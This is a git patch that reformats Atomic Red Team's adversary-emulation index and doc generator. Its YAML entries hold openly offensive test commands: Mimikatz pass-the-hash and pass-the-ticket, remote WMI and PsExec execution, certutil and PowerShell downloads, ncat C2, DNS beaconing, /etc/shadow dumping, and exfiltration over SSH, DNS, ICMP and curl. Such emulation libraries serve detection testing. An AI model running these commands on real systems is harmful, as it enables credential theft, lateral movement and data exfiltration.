(iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -65488,7 +65488,7 @@ execution: cleanup_command: 'Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin" -ErrorAction Ignore -' + ' name: powershell T1059.003: technique: @@ -65539,7 +65539,7 @@ execution: description: 'Creates and executes a simple batch script. Upon execution, CMD will briefly launch to run the batch script then close again. -' + ' supported_platforms: - windows input_arguments: @@ -65555,27 +65555,27 @@ execution: dependencies: - description: 'Batch file must exist on disk at specified location (#{script_path}) -' + ' prereq_command: 'if (Test-Path #{script_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item #{script_path} -Force | Out-Null Set-Content -Path #{script_path} -Value "#{command_to_execute}" executor: command: 'Start-Process #{script_path} -' + ' cleanup_command: 'Remove-Item #{script_path} -Force -ErrorAction Ignore -' + ' name: powershell - name: Writes text to a file and displays it. auto_generated_guid: 127b4afe-2346-4192-815c-69042bec570e description: 'Writes text to a file and display the results. This test is intended to emulate the dropping of a malicious file to disk. -' + ' supported_platforms: - windows input_arguments: @@ -65590,17 +65590,17 @@ execution: executor: command: 'echo "#{message}" > "#{file_contents_path}" & type "#{file_contents_path}" -' + ' cleanup_command: 'del "#{file_contents_path}" >nul 2>&1 -' + ' name: command_prompt - name: Suspicious Execution via Windows Command Shell auto_generated_guid: d0eb3597-a1b3-4d65-b33b-2cda8d397f20 description: 'Command line executed via suspicious invocation. Example is from the 2021 Threat Detection Report by Red Canary. -' + ' supported_platforms: - windows input_arguments: @@ -65691,7 +65691,7 @@ execution: executor: command: 'wmic useraccount get /ALL /format:csv -' + ' name: command_prompt - name: WMI Reconnaissance Processes auto_generated_guid: 5750aa16-0e59-4410-8b9a-8a47ca2788e2 @@ -65703,7 +65703,7 @@ execution: executor: command: 'wmic process get caption,executablepath,commandline /format:csv -' + ' name: command_prompt - name: WMI Reconnaissance Software auto_generated_guid: 718aebaa-d0e0-471a-8241-c5afa69c7414 @@ -65715,7 +65715,7 @@ execution: executor: command: 'wmic qfe get description,installedOn /format:csv -' + ' name: command_prompt - name: WMI Reconnaissance List Remote Services auto_generated_guid: 0fd48ef7-d890-4e93-a533-f7dedd5191d3 @@ -65739,7 +65739,7 @@ execution: executor: command: 'wmic /node:"#{node}" service where (caption like "%#{service_search_string}%") -' + ' name: command_prompt - name: WMI Execute Local Process auto_generated_guid: b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3 @@ -65756,11 +65756,11 @@ execution: executor: command: 'wmic process call create #{process_to_execute} -' + ' cleanup_command: 'wmic process where name=''#{process_to_execute}'' delete >nul 2>&1 -' + ' name: command_prompt - name: WMI Execute Remote Process auto_generated_guid: 9c8ef159-c666-472f-9874-90c8d60d136b @@ -65791,11 +65791,11 @@ execution: command: 'wmic /user:#{user_name} /password:#{password} /node:"#{node}" process call create #{process_to_execute} -' + ' cleanup_command: 'wmic /user:#{user_name} /password:#{password} /node:"#{node}" process where name=''#{process_to_execute}'' delete >nul 2>&1 -' + ' name: command_prompt - name: Create a Process using WMI Query and an Encoded Command auto_generated_guid: 7db7a7f9-9531-4840-9b30-46220135441c @@ -65812,7 +65812,7 @@ execution: executor: command: 'powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA -' + ' name: command_prompt - name: Create a Process using obfuscated Win32_Process auto_generated_guid: 10447c83-fc38-462a-a936-5102363b1c43 @@ -65846,7 +65846,7 @@ execution: description: 'This test uses wmic.exe to execute a DLL function using rundll32. Specify a valid value for remote IP using the node parameter. -' + ' supported_platforms: - windows input_arguments: @@ -65870,12 +65870,12 @@ execution: get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/bin/calc.dll?raw=true" -OutFile "#{dll_to_execute}" -' + ' executor: command: 'wmic /node:#{node} process call create "rundll32.exe #{dll_to_execute} #{function_to_execute}" -' + ' cleanup_command: taskkill /f /im calculator.exe name: powershell - name: Application uninstall using WMIC @@ -66198,7 +66198,7 @@ lateral-movement: command: '[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7") -' + ' name: powershell T1210: technique: @@ -66451,7 +66451,7 @@ lateral-movement: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) -' + ' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -66466,13 +66466,13 @@ lateral-movement: command: '#{mimikatz_path} "sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}" -' + ' name: command_prompt - name: crackmapexec Pass the Hash auto_generated_guid: eb05b028-16c8-4ad8-adea-6f5b219da9a9 description: 'command execute with crackmapexec -' + ' supported_platforms: - windows input_arguments: @@ -66501,14 +66501,14 @@ lateral-movement: - description: 'CrackMapExec executor must exist on disk at specified location (#{crackmapexec_exe}) -' + ' prereq_command: 'if(Test-Path #{crackmapexec_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Automated installer not implemented yet, please install crackmapexec manually at this location: #{crackmapexec_exe} -' + ' executor: command: "#{crackmapexec_exe} #{domain} -u #{user_name} -H #{ntlm} -x #{command}\n" name: command_prompt @@ -66589,7 +66589,7 @@ lateral-movement: auto_generated_guid: dbf38128-7ba7-4776-bedf-cc2eed432098 description: 'Similar to PTH, but attacking Kerberos -' + ' supported_platforms: - windows input_arguments: @@ -66597,7 +66597,7 @@ lateral-movement: description: Ticket file name usually format of 'id-username\@domain.kirbi' (e.g. can be dumped by "sekurlsa::tickets /export" module) type: String - default: + default: mimikatz_exe: description: Path of the Mimikatz binary type: Path @@ -66606,10 +66606,10 @@ lateral-movement: dependencies: - description: 'Mimikatz must exist on disk at specified location (#{mimikatz_exe}) -' + ' prereq_command: 'if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href @@ -66620,7 +66620,7 @@ lateral-movement: executor: command: '#{mimikatz_exe} "kerberos::ptt #{ticket}" -' + ' name: command_prompt - name: Rubeus Kerberos Pass The Ticket auto_generated_guid: a2fc4ec5-12c6-4fb4-b661-961f23f359cb @@ -66663,19 +66663,19 @@ lateral-movement: dependencies: - description: 'Rubeus must exist on disk at specified location (#{rubeus_path}) -' + ' prereq_command: 'if (Test-Path #{rubeus_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{rubeus_path} -' + ' - description: 'PsExec must exist on disk at specified location (#{psexec_path}) -' + ' prereq_command: 'if (Test-Path #{psexec_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force @@ -66769,7 +66769,7 @@ lateral-movement: net start sesshijack cleanup_command: 'sc.exe delete sesshijack >nul 2>&1 -' + ' name: command_prompt elevation_required: true T1021.001: @@ -66841,7 +66841,7 @@ lateral-movement: auto_generated_guid: 355d4632-8cb9-449d-91ce-b566d0253d3e description: 'Attempt an RDP session via Remote Desktop Application to a DomainController. -' + ' supported_platforms: - windows input_arguments: @@ -66864,15 +66864,15 @@ lateral-movement: dependencies: - description: 'Computer must be domain joined -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) { exit 0} else { exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually -' + ' executor: command: | $Server=#{logonserver} @@ -66889,7 +66889,7 @@ lateral-movement: auto_generated_guid: 7382a43e-f19c-46be-8f09-5c63af7d3e2b description: 'Attempt an RDP session via Remote Desktop Application over Powershell -' + ' supported_platforms: - windows input_arguments: @@ -66922,7 +66922,7 @@ lateral-movement: description: 'Changing RDP Port to Non Standard Port via Remote Desktop Application over Powershell -' + ' supported_platforms: - windows input_arguments: @@ -66946,7 +66946,7 @@ lateral-movement: auto_generated_guid: 74ace21e-a31c-4f7d-b540-53e4eb6d1f73 description: 'Changing RDP Port to Non Standard Port via Command_Prompt -' + ' supported_platforms: - windows input_arguments: @@ -67227,7 +67227,7 @@ lateral-movement: auto_generated_guid: 3386975b-367a-4fbb-9d77-4dcf3639ffd3 description: 'Connecting To Remote Shares -' + ' supported_platforms: - windows input_arguments: @@ -67251,13 +67251,13 @@ lateral-movement: command: 'cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}" -' + ' name: command_prompt - name: Map Admin Share PowerShell auto_generated_guid: 514e9cd7-9207-4882-98b1-c8f791bae3c5 description: 'Map Admin share utilizing PowerShell -' + ' supported_platforms: - windows input_arguments: @@ -67276,14 +67276,14 @@ lateral-movement: executor: command: 'New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name} -' + ' name: powershell - name: Copy and Execute File with PsExec auto_generated_guid: 0eb03d41-79e4-4393-8e57-6344856be1cf description: 'Copies a file to a remote host and executes it using PsExec. Requires the download of PsExec from [https://docs.microsoft.com/en-us/sysinternals/downloads/psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec). -' + ' supported_platforms: - windows input_arguments: @@ -67304,10 +67304,10 @@ lateral-movement: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe}) -' + ' prereq_command: 'if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force @@ -67337,7 +67337,7 @@ lateral-movement: command: 'cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1 -' + ' name: command_prompt elevation_required: true T1021.004: @@ -67568,7 +67568,7 @@ lateral-movement: description: 'An adversary may use Radmin Viewer Utility to remotely control Windows device, this will start the radmin console. -' + ' supported_platforms: - windows input_arguments: @@ -67584,10 +67584,10 @@ lateral-movement: - description: 'Radmin Viewer Utility must be installed at specified location (#{radmin_exe}) -' + ' prereq_command: 'if not exist "#{radmin_exe}" (exit /b 1) -' + ' get_prereq_command: | echo Downloading radmin installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer} @@ -67880,7 +67880,7 @@ lateral-movement: executor: command: 'Enable-PSRemoting -Force -' + ' name: powershell elevation_required: true - name: Invoke-Command @@ -67903,7 +67903,7 @@ lateral-movement: executor: command: 'invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}} -' + ' name: powershell - name: WinRM Access with Evil-WinRM auto_generated_guid: efe86d95-44c4-4509-ae42-7bfd9d1f5b3d @@ -68264,7 +68264,7 @@ command-and-control: "#{query_type}" "#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}" -QuickTimeout} -' + ' name: powershell - name: DNS Regular Beaconing auto_generated_guid: 3efc144e-1af8-46bb-8ca2-1376bb6db8b6 @@ -69062,7 +69062,7 @@ command-and-control: auto_generated_guid: 0fc6e977-cb12-44f6-b263-2824ba917409 description: 'Utilize rsync to perform a remote file copy (push) -' + ' supported_platforms: - linux - macos @@ -69086,13 +69086,13 @@ command-and-control: executor: command: 'rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path} -' + ' name: bash - name: rsync remote file copy (pull) auto_generated_guid: 3180f7d5-52c0-4493-9ea0-e3431a84773f description: 'Utilize rsync to perform a remote file copy (pull) -' + ' supported_platforms: - linux - macos @@ -69116,13 +69116,13 @@ command-and-control: executor: command: 'rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path} -' + ' name: bash - name: scp remote file copy (push) auto_generated_guid: 83a49600-222b-4866-80a0-37736ad29344 description: 'Utilize scp to perform a remote file copy (push) -' + ' supported_platforms: - linux - macos @@ -69146,13 +69146,13 @@ command-and-control: executor: command: 'scp #{local_file} #{username}@#{remote_host}:#{remote_path} -' + ' name: bash - name: scp remote file copy (pull) auto_generated_guid: b9d22b9a-9778-4426-abf0-568ea64e9c33 description: 'Utilize scp to perform a remote file copy (pull) -' + ' supported_platforms: - linux - macos @@ -69176,13 +69176,13 @@ command-and-control: executor: command: 'scp #{username}@#{remote_host}:#{remote_file} #{local_path} -' + ' name: bash - name: sftp remote file copy (push) auto_generated_guid: f564c297-7978-4aa9-b37a-d90477feea4e description: 'Utilize sftp to perform a remote file copy (push) -' + ' supported_platforms: - linux - macos @@ -69206,13 +69206,13 @@ command-and-control: executor: command: 'sftp #{username}@#{remote_host}:#{remote_path} <<< $''put #{local_file}'' -' + ' name: bash - name: sftp remote file copy (pull) auto_generated_guid: '0139dba1-f391-405e-a4f5-f3989f2c88ef' description: 'Utilize sftp to perform a remote file copy (pull) -' + ' supported_platforms: - linux - macos @@ -69236,14 +69236,14 @@ command-and-control: executor: command: 'sftp #{username}@#{remote_host}:#{remote_file} #{local_path} -' + ' name: bash - name: certutil download (urlcache) auto_generated_guid: dd3b61dd-7bbc-48cd-ab51-49ad1a776df0 description: 'Use certutil -urlcache argument to download a file from the web. Note - /urlcache also works! -' + ' supported_platforms: - windows input_arguments: @@ -69258,17 +69258,17 @@ command-and-control: executor: command: 'cmd /c certutil -urlcache -split -f #{remote_file} #{local_path} -' + ' cleanup_command: 'del #{local_path} >nul 2>&1 -' + ' name: command_prompt - name: certutil download (verifyctl) auto_generated_guid: ffd492e3-0455-4518-9fb1-46527c9f241b description: 'Use certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works! -' + ' supported_platforms: - windows input_arguments: @@ -69290,7 +69290,7 @@ command-and-control: cleanup_command: 'Remove-Item "certutil-$(Get-Date -format yyyy_MM_dd)" -Force -Recurse -ErrorAction Ignore -' + ' name: powershell - name: Windows - BITSAdmin BITS Download auto_generated_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b @@ -69316,7 +69316,7 @@ command-and-control: command: 'C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} #{local_path} -' + ' name: command_prompt - name: Windows - PowerShell Download auto_generated_guid: 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8 @@ -69338,17 +69338,17 @@ command-and-control: command: '(New-Object System.Net.WebClient).DownloadFile("#{remote_file}", "#{destination_path}") -' + ' cleanup_command: 'Remove-Item #{destination_path} -Force -ErrorAction Ignore -' + ' name: powershell - name: OSTAP Worming Activity auto_generated_guid: 2ca61766-b456-4fcf-a35a-1233685e1cad description: 'OSTap copies itself in a specfic way to shares and secondary drives. This emulates the activity. -' + ' supported_platforms: - windows input_arguments: @@ -69425,7 +69425,7 @@ command-and-control: auto_generated_guid: c99a829f-0bb8-4187-b2c6-d47d1df74cab description: 'Download a remote file using the whois utility -' + ' supported_platforms: - linux - macos @@ -69453,29 +69453,29 @@ command-and-control: dependencies: - description: 'The whois and timeout commands must be present -' + ' prereq_command: 'which whois && which timeout -' + ' get_prereq_command: 'echo "Please install timeout and the whois package" -' + ' executor: name: sh elevation_required: false command: 'timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file} -' + ' cleanup_command: 'rm -f #{output_file} -' + ' - name: File Download via PowerShell auto_generated_guid: 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 description: 'Use PowerShell to download and write an arbitrary file from the internet. Example is from the 2021 Threat Detection Report by Red Canary. -' + ' supported_platforms: - windows input_arguments: @@ -69509,7 +69509,7 @@ command-and-control: name: command_prompt command: 'finger base64_filedata@#{remote_host} -' + ' - name: Download a file with IMEWDBLD.exe auto_generated_guid: 1a02df58-09af-4064-a765-0babe1a0d1e2 description: | @@ -69557,10 +69557,10 @@ command-and-control: dependencies: - description: 'Curl must be installed on system. -' + ' prereq_command: 'if (Test-Path #{curl_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile $env:temp\curl.zip Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl @@ -69603,10 +69603,10 @@ command-and-control: dependencies: - description: 'Curl must be installed on system. -' + ' prereq_command: 'if (Test-Path #{curl_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | Invoke-WebRequest “https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip” -Outfile $env:temp\curl.zip Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl @@ -69615,13 +69615,13 @@ command-and-control: Remove-Item $env:temp\curl.zip - description: 'A file must be created to upload -' + ' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'echo "This is an Atomic Test File" > #{file_path} -' + ' executor: command: | #{curl_path} -T #{file_path} #{remote_destination} @@ -69719,7 +69719,7 @@ command-and-control: executor: command: 'export #{proxy_scheme}_proxy=#{proxy_server} -' + ' cleanup_command: | unset http_proxy unset https_proxy @@ -70108,10 +70108,10 @@ command-and-control: dependencies: - description: 'ncat.exe must be available at specified location (#{ncat_exe}) -' + ' prereq_command: 'if( Test-Path "#{ncat_exe}") {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -ItemType Directory -Force -Path #{ncat_path} | Out-Null @@ -70125,7 +70125,7 @@ command-and-control: executor: command: 'cmd /c #{ncat_exe} #{server_ip} #{server_port} -' + ' name: powershell - name: Powercat C2 auto_generated_guid: 3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e @@ -70274,13 +70274,13 @@ command-and-control: executor: command: 'Test-NetConnection -ComputerName #{domain} -port #{port} -' + ' name: powershell - name: Testing usage of uncommonly used port auto_generated_guid: 5db21e1d-dd9c-4a50-b885-b1e748912767 description: 'Testing uncommonly used port utilizing telnet. -' + ' supported_platforms: - linux - macos @@ -70296,7 +70296,7 @@ command-and-control: executor: command: 'telnet #{domain} #{port} -' + ' name: sh T1102.003: technique: @@ -70538,7 +70538,7 @@ command-and-control: -Minimum 1 -Maximum 999999).#{domain}&type=#{query_type}" -UseBasicParsing).Content } -' + ' name: powershell - name: DNS over HTTPS Regular Beaconing auto_generated_guid: 0c5f9705-c575-42a6-9609-cbbff4b2fc9b @@ -70728,7 +70728,7 @@ command-and-control: and using this to maintain access to the machine. Download of TeamViewer installer will be at the destination location when sucessfully executed. -' + ' supported_platforms: - windows executor: @@ -70749,7 +70749,7 @@ command-and-control: and use to establish C2. Download of AnyDesk installer will be at the destination location and ran when sucessfully executed. -' + ' supported_platforms: - windows executor: @@ -70768,7 +70768,7 @@ command-and-control: and use to establish C2. Download of LogMeIn installer will be at the destination location and ran when sucessfully executed. -' + ' supported_platforms: - windows executor: @@ -70788,7 +70788,7 @@ command-and-control: and use to establish C2. Download of GoToAssist installer will be at the destination location and ran when sucessfully executed. -' + ' supported_platforms: - windows executor: @@ -70874,7 +70874,7 @@ command-and-control: auto_generated_guid: 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25 description: 'Utilizing a common technique for posting base64 encoded data. -' + ' supported_platforms: - macos - linux @@ -71180,7 +71180,7 @@ command-and-control: - description: "Curl must be installed on system \n" prereq_command: 'if (Test-Path #{curl_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://curl.haxx.se/windows/dl-7.71.1/curl-7.71.1-win32-mingw.zip" -Outfile $env:temp\curl.zip Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl @@ -71385,7 +71385,7 @@ exfiltration: auto_generated_guid: ab936c51-10f4-46ce-9144-e02137b2016a description: 'Take a file/directory, split it into 5Mb chunks -' + ' supported_platforms: - macos - linux @@ -71404,12 +71404,12 @@ exfiltration: prereq_command: 'if [ ! -f #{folder_path}/#{file_name} ]; then exit 1; else exit 0; fi; -' + ' get_prereq_command: 'if [ ! -d #{folder_path} ]; then mkdir -p #{folder_path}; touch #{folder_path}/safe_to_delete; fi; dd if=/dev/urandom of=#{folder_path}/#{file_name} bs=25000000 count=1 -' + ' executor: command: | cd #{folder_path}; split -b 5000000 #{file_name} @@ -71417,7 +71417,7 @@ exfiltration: cleanup_command: 'if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path}; fi; -' + ' name: sh T1048: technique: @@ -71496,7 +71496,7 @@ exfiltration: executor: command: 'ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz -' + ' name: sh - name: Exfiltration Over Alternative Protocol - SSH auto_generated_guid: 7c3cb337-35ae-4d06-bf03-3032ed2ec268 @@ -71526,7 +71526,7 @@ exfiltration: command: 'tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} ''cat > /Users.tar.gz.enc'' -' + ' name: sh - name: DNSExfiltration (doh) auto_generated_guid: c943d285-ada3-45ca-b3aa-7cd6500c6a48 @@ -71562,20 +71562,20 @@ exfiltration: description: Set to '-b32' to use base32 encoding of data. Might be required by some DNS resolvers. type: String - default: + default: dependency_executor_name: powershell dependencies: - description: 'DNSExfiltrator powershell file must exist on disk at specified location (#{ps_module}) -' + ' prereq_command: 'if (Test-Path #{ps_module}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'IWR "https://raw.githubusercontent.com/Arno0x/DNSExfiltrator/8faa972408b0384416fffd5b4d42a7aa00526ca8/Invoke-DNSExfiltrator.ps1" -OutFile #{ps_module} -' + ' executor: command: | Import-Module #{ps_module} @@ -71639,7 +71639,7 @@ exfiltration: auto_generated_guid: 1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0 description: 'Exfiltrate data HTTPS using curl to file share site file.io -' + ' supported_platforms: - windows input_arguments: @@ -71655,10 +71655,10 @@ exfiltration: dependencies: - description: 'Curl must be installed on system. -' + ' prereq_command: 'if (Test-Path #{curl_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile $env:temp\curl.zip Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl @@ -71674,7 +71674,7 @@ exfiltration: auto_generated_guid: 4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01 description: 'Exfiltrate data HTTPS using curl to file share site file.io -' + ' supported_platforms: - macos - linux @@ -71775,7 +71775,7 @@ exfiltration: auto_generated_guid: d1253f6e-c29b-49dc-b466-2147a6191932 description: 'Exfiltrates a file present on the victim machine to the C2 server. -' + ' supported_platforms: - windows input_arguments: @@ -72028,13 +72028,13 @@ exfiltration: in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) } -' + ' name: powershell - name: Exfiltration Over Alternative Protocol - DNS auto_generated_guid: c403b5a4-b5fc-49f2-b181-d1c80d27db45 description: 'Exfiltration of specified file over DNS protocol. -' + ' supported_platforms: - linux executor: @@ -72079,7 +72079,7 @@ exfiltration: command: 'Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1048.003 Atomic Test" -Attachments #{input_file} -SmtpServer #{smtp_server} -' + ' name: powershell input_arguments: input_file: @@ -72482,7 +72482,7 @@ initial-access: description: 'GCP Service Accounts can be used to gain intial access as well as maintain persistence inside Google Cloud. -' + ' supported_platforms: - google-workspace - windows @@ -72517,20 +72517,20 @@ initial-access: cleanup_command: 'gcloud iam service-accounts delete #{service-account-email} --quiet -' + ' dependency_executor_name: gcloud dependencies: - description: 'Requires gcloud -' + ' prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install" -' + ' T1195.003: technique: external_references: @@ -72768,7 +72768,7 @@ initial-access: description: 'The Adversaries can activate the default Guest user. The guest account is inactivated by default -' + ' supported_platforms: - windows input_arguments: @@ -72779,10 +72779,10 @@ initial-access: executor: command: 'net user #{guest_user} /active:yes -' + ' cleanup_command: 'net user #{guest_user} /active:no -' + ' name: command_prompt elevation_required: true T1078.002: @@ -73096,7 +73096,7 @@ initial-access: description: 'Running Chrome VPN Extensions via the Registry install 2 vpn extension, please see "T1133\src\list of vpn extension.txt" to view complete list -' + ' supported_platforms: - windows input_arguments: @@ -73109,12 +73109,12 @@ initial-access: type: String default: '"fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme" -' + ' dependency_executor_name: powershell dependencies: - description: 'Chrome must be installed -' + ' prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1} @@ -73483,7 +73483,7 @@ initial-access: cleanup_command: 'Remove-Item $env:TEMP\PhishingAttachment.xlsm -ErrorAction Ignore -' + ' - name: Word spawned a command shell and used an IP address in the command line auto_generated_guid: cbb6799a-425c-4f83-9194-5447a909d67f description: | @@ -73495,7 +73495,7 @@ initial-access: jse_path: description: 'Path for the macro to write out the "malicious" .jse file -' + ' type: String default: C:\Users\Public\art.jse ms_product: @@ -73506,7 +73506,7 @@ initial-access: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -73517,7 +73517,7 @@ initial-access: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -73526,7 +73526,7 @@ initial-access: Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore -' + ' name: powershell T1566.002: technique: diff --git a/bin/generate-atomic-docs.rb b/bin/generate-atomic-docs.rb index df178712..d023d67c 100755 --- a/bin/generate-atomic-docs.rb +++ b/bin/generate-atomic-docs.rb @@ -233,13 +233,16 @@ class AtomicRedTeamDocs "techniqueID" => atomic_yaml['attack_technique'], "score" => 100, "enabled" => true, - "comment" => "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/" + atomic_yaml['attack_technique'] + "/" + atomic_yaml['attack_technique'] + ".md" +# "comment" => "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/" + atomic_yaml['attack_technique'] + "/" + atomic_yaml['attack_technique'] + ".md" + "links" => ["label" => "View Atomic", "url" => "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/" + atomic_yaml['attack_technique'] + "/" + atomic_yaml['attack_technique'] + ".md"] } + techniqueParent = { "techniqueID" => atomic_yaml['attack_technique'].split('.')[0], "score" => 100, "enabled" => true, - "comment" => "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/" + atomic_yaml['attack_technique'] + "/" + atomic_yaml['attack_technique'] + ".md" +# "comment" => "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/" + atomic_yaml['attack_technique'] + "/" + atomic_yaml['attack_technique'] + ".md" + "links" => ["label" => "View Atomic", "url" => "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/" + atomic_yaml['attack_technique'] + "/" + atomic_yaml['attack_technique'] + ".md"] } techniques.push(technique) From ebe64397beee1d073a91243288cba8a805a0628a Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 31 Jan 2022 20:33:23 +0000 Subject: [PATCH 09/11] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 4140 ++++++++++++++++++------------------ 1 file changed, 2070 insertions(+), 2070 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 167324d3..b54288eb 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -61,7 +61,7 @@ credential-access: cat #{output_file} cleanup_command: 'rm -f #{output_file} - ' +' name: bash elevation_required: true - name: Access /etc/passwd (Local) @@ -80,13 +80,13 @@ credential-access: cat #{output_file} cleanup_command: 'rm -f #{output_file} - ' +' name: sh - name: Access /etc/{shadow,passwd} with a standard bin that's not cat auto_generated_guid: df1a55ae-019d-4120-bc35-94f4bc5c4b0a description: 'Dump /etc/passwd and /etc/shadow using ed - ' +' supported_platforms: - linux input_arguments: @@ -97,17 +97,17 @@ credential-access: executor: command: 'echo -e "e /etc/passwd\n,p\ne /etc/shadow\n,p\n" | ed > #{output_file} - ' +' cleanup_command: 'rm -f #{output_file} - ' +' name: bash elevation_required: true - name: Access /etc/{shadow,passwd} with shell builtins auto_generated_guid: f5aa6543-6cb2-4fae-b9c2-b96e14721713 description: 'Dump /etc/passwd and /etc/shadow using bash builtins - ' +' supported_platforms: - linux input_arguments: @@ -122,7 +122,7 @@ credential-access: testcat /etc/shadow > #{output_file} cleanup_command: 'rm -f #{output_file} - ' +' name: bash elevation_required: true T1557.002: @@ -313,32 +313,32 @@ credential-access: dependencies: - description: 'Computer must be domain joined - ' +' prereq_command: 